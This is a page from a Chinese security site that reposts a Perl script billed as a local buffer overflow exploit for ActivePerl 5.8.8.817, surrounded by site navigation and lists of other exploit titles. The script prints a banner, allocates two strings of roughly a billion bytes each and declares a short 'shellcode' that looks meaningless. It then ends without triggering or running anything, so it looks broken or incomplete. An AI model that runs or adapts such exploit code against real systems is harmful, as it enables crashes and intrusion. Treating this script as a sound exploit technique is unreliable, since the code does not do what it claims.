首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ActivePerl v5.8.8.817 Buffer Overflow
来源:vfocus.net 作者:PoisonCode 发布时间:2010-06-11  
=====================================
ActivePerl v5.8.8.817 Buffer Overflow
=====================================


# Title:Local Buffer Overflow ActivePerl v5.8.8.817
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PoisonCode
# Published: 2010-06-09
# Download Exploit Code
# Download Vulnerable app
# Title:Local Buffer Overflow ActivePerl v5.8.8.817
# Software Link:http://www.activestate.com
# Version: v5.8.8.817
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
 
_____    _____                      _ _        
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/
 
 
Exploit
-------------------------------------------
#!/usr/bin/perl
# File Name :Local Buffer Overflow ActivePerl
# Author :PoisonCode
# Exploit Title: Local Buffer Overflow ActivePerl
# Date:09/06/2010
# Author:PoisonCode
# Site  :http://www.activestate.com
# Version: 5.8.8.817
# Tested on: Windows
$file="Exploit Perl Version 5.8.8.817";
print " ============================================\n";
print " =     Local Buffer Overflow ActivePerl      =\n";
print " =        Version: 5.8.8.817                 =\n";
print " =            Autor:PoisonCode               =\n";
print " =    Web :PanamaSecurity.blogspot.com       =\n";
print " =============================================\n";
print "\n";
print " Espere Mientras Trabaja el Exploit\n";
my $fruty="\x87" x 999999999;
my $loops="\x67" x 999999999;
my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d"; 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AWCM CMS Local File Inclusion
·Microsoft Windows Help Centre
·K-Meleon Remote Denial of Serv
·Safari 5.0 Remote Buffer OverF
·Orca Browser Remoter Denial Of
·Adobe InDesign CS3 INDD File H
·Firefox 3.6.3 Remoter Denial O
·nginx 0.8.36 Source Disclosure
·Solaris/x86 - Sync() & reboot(
·Power Tab Editor v1.7 (Build 8
·Netvolution CMS <= 2.x SQL Inj
·Nginx <= 0.7.65 / 0.8.39 (dev)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved